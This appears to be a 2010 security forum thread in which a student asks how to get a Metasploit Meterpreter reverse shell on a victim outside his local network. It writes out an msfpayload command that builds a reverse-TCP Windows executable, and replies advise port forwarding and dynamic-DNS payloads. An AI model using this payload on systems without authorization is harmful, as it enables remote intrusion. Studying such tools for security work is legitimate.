Thread: Meterpreter reverse TCP question??

Just burned his ISO

Default Meterpreter reverse TCP question??

Hello,
    I posted this on another forum , however, it appears that everyone there is a complete skiddie and doesn't know anything except how to follow botnet tutorials and type in l33t speak (Can u feel my disgust yet??)

Anyways,
    I have a question for you metasploit pros out there..

As most you know you can generate a meterpreter payload using

Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[LOCAL IP] LPORT = [Port #] >filename.exe

My question is can you use a routeable (external ip) address so that you can gain access remotely?? As in gain meterpreter shell to a victim not on your local subnet??
    Last edited by BurningDownBabylon; 05-06-2010 at 06:32 PM.

Developer

Default Re: Meterpreter reverse TCP question??

yes of course you just have to make sure that port forwarding is enabled on the attacking network so that it can receive the incoming connection from the victim box.

Yes, port forwarding is key for NAT. Also you can use certain payloads which resolve dns at runtime (in order to track your dynamic ip changes).
    I've seen things you people wouldn't believe.

You probably want to build your TCP/IP-fu - its critical to have a solid understanding of networking before you can effectively use tools like Metasploit - especially for the more difficult targets which may require bouncing or tunneling over alternate protocols like HTTP/SSL. Specifically Id read up on NAT and the ways in which UDP and TCP are used to transmit data. The Official CCNA Study Guide and TCP/IP Illustrated are my recommended resources, along with lots of time spent with Wireshark and tcpdump.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Just burned his ISO

Quote Originally Posted by lupin View Post
    You probably want to build your TCP/IP-fu - its critical to have a solid understanding of networking before you can effectively use tools like Metasploit - especially for the more difficult targets which may require bouncing or tunneling over alternate protocols like HTTP/SSL. Specifically Id read up on NAT and the ways in which UDP and TCP are used to transmit data. The Official CCNA Study Guide and TCP/IP Illustrated are my recommended resources, along with lots of time spent with Wireshark and tcpdump.
    Thank you all that replied.
    I am in junior year of college of an information security degree and while I would love to believe that school teaches me everything I would need to know, I am not that foolish. So, I am always looking for supplemental reading. So thanks Lupin for suggesting CCNA study guide.. I'll get to reading